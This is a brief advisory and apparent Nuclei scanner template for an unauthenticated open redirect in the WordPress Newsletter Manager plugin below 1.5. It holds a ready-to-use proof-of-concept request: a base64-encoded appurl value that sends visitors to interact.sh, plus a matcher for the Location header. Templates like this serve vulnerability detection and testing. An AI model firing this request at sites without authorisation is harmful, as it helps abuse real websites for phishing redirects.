WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the header() PHP function, leading to an open redirect issue.
PoC代码[已公开]
id: newsletter-open-redirect
info:
name: WordPress Newsletter Manager < 1.5 - Unauthenticated Open Redirect
author: dhiyaneshDk
severity: medium
description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the header() PHP function, leading to an open redirect issue.
reference:
- https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
classification:
cwe-id: CWE-601
metadata:
max-request: 1
tags: redirect,wp-plugin,newsletter,wp,wpscan,wordpress
http:
- method: GET
path:
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a00473045022100e1aa2510dd1cf398da073d6fd3e130aabb7777fe59d0b2432b295c2a9e371ff802203e596a0077d7c8cdf721d27f54a0e38b408e40b5097207e3909f3a26377eac36:922c64590222798bb761d5b6d8e72950